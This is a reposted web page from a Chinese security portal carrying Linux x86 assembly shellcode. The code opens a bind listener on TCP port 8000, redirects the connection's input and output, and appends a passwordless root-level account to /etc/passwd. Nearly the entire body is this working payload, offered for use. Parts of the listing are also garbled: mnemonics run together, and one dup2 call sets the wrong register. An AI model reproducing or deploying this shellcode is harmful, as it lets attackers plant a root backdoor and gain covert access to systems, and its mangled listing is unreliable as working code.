收藏本站 找回密码
开启辅助访问 OTP 注册 找回密码
安基网 首页 安全 安全学院 查看内容

Bindport TCP/8000 & execve add user with access root

2009-6-9 09:35| 投稿: security


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要:   ; Title: Bindport TCP/8000 & execve add user with access root  ; os: Linux x86  ; size: 225+ b...
  ; Title: Bindport TCP/8000 & execve add user with access root  ; os: Linux x86  ; size: 225+ bytes  ; IP: localhost  ; Port: 8000  ; Use: nc localhost 8000  ;  ; Author: Jonathan Salwan  ; Mail: submit AT shell-storm.org  ; Web: http://www.shell-storm.org  ;  ;  ; More shellcodes in => http://www.shell-storm.org/shellcode/  ;  section .text  global _start  _start:  ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;  pushbyte0x0  pushbyte0x1  pushbyte0x2  moveax, 0x66  movebx, 0x1  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;  mov edx, eax  ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;  pushbyte0x0  pushbyte0x0  pushbyte0x0  pushword0x401f  pushword0x2  movebx, esp  push byte0x10  pushebx  pushedx  moveax, 0x66  movebx, 0x2  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;  pushbyte0x1  pushedx  moveax,0x66  movebx,0x4  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;  pushbyte0x0  pushbyte0x0  pushedx  moveax, 0x66  movebx, 0x5  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;  movedx, eax  ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;  moveax, 0x3f  movebx, edx  mov ebx, 0x2  int0x80  mov     eax, 0x3f  mov     ebx, edx  mov     ecx, 0x1  int       0x80  mov     eax, 0x3f  mov     ebx, edx  mov     ecx, 0x0  int       0x80  ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;;  push byte 0x05  pop eax  xor ecx, ecx  push ecx  push 0x64777373  push 0x61702f2f  push 0x6374652f  mov ebx, esp  mov cx, 02001Q  int0x80  ;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;;  mov ebx, eax  ;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;;  push byte 0x04  pop eax  xor edx, edx  push edx  pushword0x6873  push0x61622f6e  push0x69622f3a  push0x746f6f72  push0x2f3a746f  push0x6f723a30  push0x3a303a3a  push0x74303072  mov ecx, esp  push byte 0x1f  pop edx  int 0x80  ;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;;  push byte 0x06  pop eax  int 0x80  ;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;;  push byte 0x01  popeax  int 0x80

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

鲜花
握手
雷人
路过
鸡蛋
收藏 邀请

相关阅读

最新评论

 最新
© 2003-2019 安基网(原黑基网) SAFEBASE.CN 京公网安备11010802027589号 京ICP备10030376号-6 【手机版】Powered by Discuz 存档  
返回顶部